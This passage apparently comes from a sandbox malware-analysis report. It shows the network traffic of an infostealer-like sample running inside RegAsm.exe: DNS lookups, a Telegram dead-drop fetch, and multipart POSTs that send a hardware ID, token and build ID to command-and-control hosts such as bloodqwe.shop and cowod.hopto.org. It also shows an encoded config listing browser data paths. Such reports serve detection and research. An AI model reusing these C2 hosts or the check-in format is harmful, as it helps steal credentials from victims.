Sep 28, 2024 05:24:14.116374969 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.119743109 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.119769096 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.120170116 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.120242119 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.120553970 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.167391062 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.760582924 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.760690928 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.760706902 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.760736942 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.760771036 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.760796070 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.761750937 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.761781931 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.764575005 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.764600992 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.764688969 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.764908075 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:14.764921904 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.252080917 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.252171993 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.252610922 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.252626896 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.254311085 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.254328966 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.956371069 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.956484079 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.956510067 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.956562042 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.956569910 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.956621885 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.956655025 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.956707001 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.956765890 CEST	49749	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.956779957 CEST	443	49749	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.958338022 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.958364010 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:15.958440065 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.958683014 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:15.958703995 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:16.420902014 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:16.421044111 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:16.421753883 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:16.421761990 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:16.423584938 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:16.423592091 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046034098 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046154976 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046161890 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046192884 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046206951 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046241999 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046293974 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046339035 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046353102 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046394110 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046427965 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.046480894 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046555996 CEST	49750	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.046571970 CEST	443	49750	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.048475981 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.048522949 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.048612118 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.048844099 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.048860073 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.510391951 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.510617971 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.511069059 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.511080027 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:17.512830019 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:17.512835979 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.224877119 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.224999905 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225018024 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225034952 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225049973 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225100994 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225106001 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225148916 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225152969 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225234032 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225238085 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225300074 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225303888 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225346088 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225347042 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.225393057 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225832939 CEST	49751	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.225850105 CEST	443	49751	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.227819920 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.227857113 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.227933884 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.228162050 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.228171110 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.693958998 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.694071054 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.694559097 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.694570065 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:18.696327925 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:18.696335077 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.416457891 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.416667938 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.416696072 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.416723967 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.416747093 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.416770935 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.416970968 CEST	49752	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.416987896 CEST	443	49752	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.476947069 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.477020025 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.477104902 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.477355003 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.477385044 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.978929996 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.979130983 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.979595900 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.979609966 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.981307983 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.981319904 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:19.981379986 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:19.981417894 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.480506897 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.480542898 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.480619907 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.480818987 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.480829954 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.763931036 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.764074087 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.764098883 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.764158010 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.764245987 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.764308929 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.765049934 CEST	49753	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.765075922 CEST	443	49753	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.955763102 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.955878019 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.956355095 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.956376076 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:20.958106041 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:20.958121061 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.532582045 CEST	49755	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.532625914 CEST	443	49755	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.532731056 CEST	49755	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.532924891 CEST	49755	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.532938004 CEST	443	49755	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.642210007 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.642293930 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.642339945 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.642376900 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.643265009 CEST	49754	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:21.643299103 CEST	443	49754	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.995588064 CEST	443	49755	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:21.995666981 CEST	49755	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:22.495522976 CEST	49755	443	192.168.2.6	172.67.167.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 05:23:23.732532978 CEST	58183	53	192.168.2.6	1.1.1.1
Sep 28, 2024 05:23:23.739099979 CEST	53	58183	1.1.1.1	192.168.2.6
Sep 28, 2024 05:23:24.620692015 CEST	61010	53	192.168.2.6	1.1.1.1
Sep 28, 2024 05:23:24.632787943 CEST	53	61010	1.1.1.1	192.168.2.6
Sep 28, 2024 05:23:43.282363892 CEST	51419	53	192.168.2.6	1.1.1.1
Sep 28, 2024 05:23:43.294085026 CEST	53	51419	1.1.1.1	192.168.2.6
Sep 28, 2024 05:23:45.076275110 CEST	58005	53	192.168.2.6	1.1.1.1
Sep 28, 2024 05:23:45.087255001 CEST	53	58005	1.1.1.1	192.168.2.6
Sep 28, 2024 05:23:54.647872925 CEST	64579	53	192.168.2.6	1.1.1.1
Sep 28, 2024 05:23:54.656299114 CEST	53	64579	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 28, 2024 05:23:23.732532978 CEST	192.168.2.6	1.1.1.1	0xbe40	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:24.620692015 CEST	192.168.2.6	1.1.1.1	0xa22d	Standard query (0)	bloodqwe.shop	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:43.282363892 CEST	192.168.2.6	1.1.1.1	0x7072	Standard query (0)	files.bloodqwe.shop	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:45.076275110 CEST	192.168.2.6	1.1.1.1	0x576a	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:54.647872925 CEST	192.168.2.6	1.1.1.1	0x7c03	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 28, 2024 05:23:23.739099979 CEST	1.1.1.1	192.168.2.6	0xbe40	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:24.632787943 CEST	1.1.1.1	192.168.2.6	0xa22d	No error (0)	bloodqwe.shop	172.67.167.90	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:24.632787943 CEST	1.1.1.1	192.168.2.6	0xa22d	No error (0)	bloodqwe.shop	104.21.73.223	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:43.294085026 CEST	1.1.1.1	192.168.2.6	0x7072	No error (0)	files.bloodqwe.shop	172.67.167.90	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:43.294085026 CEST	1.1.1.1	192.168.2.6	0x7072	No error (0)	files.bloodqwe.shop	104.21.73.223	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:45.087255001 CEST	1.1.1.1	192.168.2.6	0x576a	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:45.087255001 CEST	1.1.1.1	192.168.2.6	0x576a	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 28, 2024 05:23:54.656299114 CEST	1.1.1.1	192.168.2.6	0x7c03	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

bloodqwe.shop

files.bloodqwe.shop

offensivedzvju.shop

cowod.hopto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49745	45.132.206.251	80	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 05:23:54.662048101 CEST	183	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA Host: cowod.hopto.org Content-Length: 2645 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 05:23:54.662106037 CEST	2645	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------JEGHDAFIDGDAAK
Sep 28, 2024 05:23:55.448919058 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 28 Sep 2024 03:23:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49719	149.154.167.99	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:24 UTC	87	OUT	GET /jamsemlg HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:24 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 28 Sep 2024 03:23:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12369 Connection: close Set-Cookie: stel_ssid=8a305275312b1df9cb_1894863477225248363; expires=Sun, 29 Sep 2024 03:23:24 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-09-28 03:23:24 UTC	12369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6a 61 6d 73 65 6d 6c 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @jamsemlg</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:25 UTC	88	OUT	GET / HTTP/1.1 Host: bloodqwe.shop Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:25 UTC	581	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OfVSh4b26HVS1uw%2BikIYHLZBqcpPh9ISSNDDMDrIuwYFgsbc12VAT53WtbxPbbwJG0%2BA2mz5KjUS3tlqaXC5IhVJVr0XeTLHlpHsP5szSbo3eypx%2B266ZQLOZ8oCkMPj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8ca09d5a6f7e5e78-EWR
2024-09-28 03:23:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:26 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: bloodqwe.shop Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:26 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 36 43 34 35 41 31 30 42 39 41 32 39 31 39 33 31 34 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 2d 2d 0d 0a Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="hwid"A96C45A10B9A291931458-a33c7340-61ca------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------CBFIJEGIDBGIECAKKEGD--
2024-09-28 03:23:26 UTC	542	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvLNmi0xmaXDPQLCheS%2Fuuhm01bytNhvHYrn7nq2p6KWb7533mHjARP0QTa7cvdYRtglSF7UmGfC%2Fj75%2BM2aBDgRY1q%2B%2F3XLWqIHBpqqTHQYzb3SzGO1DI02mrq9rkSR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d61ad788c0f-EWR
2024-09-28 03:23:26 UTC	64	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a Data Ascii: 3a1\|1\|1\|1\|977fac68f0dcd1c25b46f6e39069759a\|1\|1\|1\|0\|0\|50000\|1
2024-09-28 03:23:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49722	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:27 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------DBKFHCFBGIIJKFHJDHDHCont
2024-09-28 03:23:28 UTC	546	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=graedlW8j3SXwMfRbNp08Kgzb%2Fc6978wP4d8kum1WUH8DjFHNpwdpn1QwIgIqr1%2BETSh0ul4IYzbw%2FB%2B2JsXlmoAqOBMvl6Jk%2BY3jn2tAL0DUzP1%2BBRE5kI%2FeDoF2xnX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d68fe8f32dc-EWR
2024-09-28 03:23:28 UTC	823	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 